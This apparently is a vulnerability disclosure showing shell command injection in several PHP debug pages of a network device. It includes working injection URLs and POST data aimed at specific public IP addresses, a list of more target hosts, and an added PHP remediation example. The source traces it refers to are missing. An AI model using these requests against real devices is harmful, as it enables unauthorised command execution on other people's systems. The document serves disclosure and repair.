bytecache_run_action.php:
First instance:
setValue
Following into it:
Following one level deeper:
This shows that value is controllable.
Second instance:
startByteCacheDebug($engine,$ipFilterNum);
Following into it:
Third instance:
When action is not 1:
stopByteCacheDebug($engine);
Following into it:
Demonstrating one instance is sufficient:
http://218.206.217.19:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10
Visit:
http://218.206.217.19:8080/acc/debug/a.php
Fourth instance:
change_lan.php
Following into setAppexSystemConfigItemValue:
Following further:
http://61.148.24.182:8080/change_lan.php
postdata:
LanID=1' | echo ' wooyun' > a.php | '
Fifth instance:
enable_tool_debug.php:
runTool:
http://61.54.222.33:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=172.0.0.1' | echo wooyun > a.php | '
getMacAddr.php:
Following into getMacAddrFromIfName:
http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |
Then visit http://218.206.217.19:8080/acc/network/c.php.
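Every trace above ends with a request parameter reaching a shell command. The following is an added example, not the vendor's code (the function bodies are not shown on this page), of how the getMacAddr.php and enable_tool_debug.php paths could be closed in PHP. The function names, the tool path and the assumption that the device is Linux with sysfs are all hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not the vendor's code. All function names are hypothetical.

// Accept only plausible Linux interface names (max 15 chars, no '/', no leading '.').
function validIfName(string $eth): ?string
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.-]{0,14}\z/', $eth) === 1 ? $eth : null;
}

// Numeric parameters (action, ipfilter, LanID, val, tool): digits only, bounded.
function validUInt(string $raw, int $max): ?int
{
    if (preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    $n = (int) $raw;
    return $n <= $max ? $n : null;
}

// Read the MAC address from sysfs instead of running a shell command (assumes Linux).
function macFromSysfs(string $eth): ?string
{
    $name = validIfName($eth);
    if ($name === null) {
        return null;
    }
    $path = "/sys/class/net/{$name}/address";
    return is_readable($path) ? trim((string) file_get_contents($path)) : null;
}

// Where a command is unavoidable: validate the type first, then quote the argument.
function buildToolCommand(string $par): ?string
{
    if (filter_var($par, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // '/usr/local/bin/example-tool' is a placeholder path.
    return '/usr/local/bin/example-tool ' . escapeshellarg($par);
}

// Constructed inputs: the parameter shapes from the requests above, plus valid values.
var_dump(validIfName(' | echo wooyun > c.php | '), validIfName('eth0'));
var_dump(validUInt("1' | echo ' wooyun' > a.php | '", 64), validUInt('10', 64));
var_dump(buildToolCommand("172.0.0.1' | echo wooyun > a.php | '"), buildToolCommand('172.0.0.1'));
```

The injected values are rejected by type validation before any command string is built. escapeshellarg is a second layer, not the only control.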
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
http://61.54.222.33:8080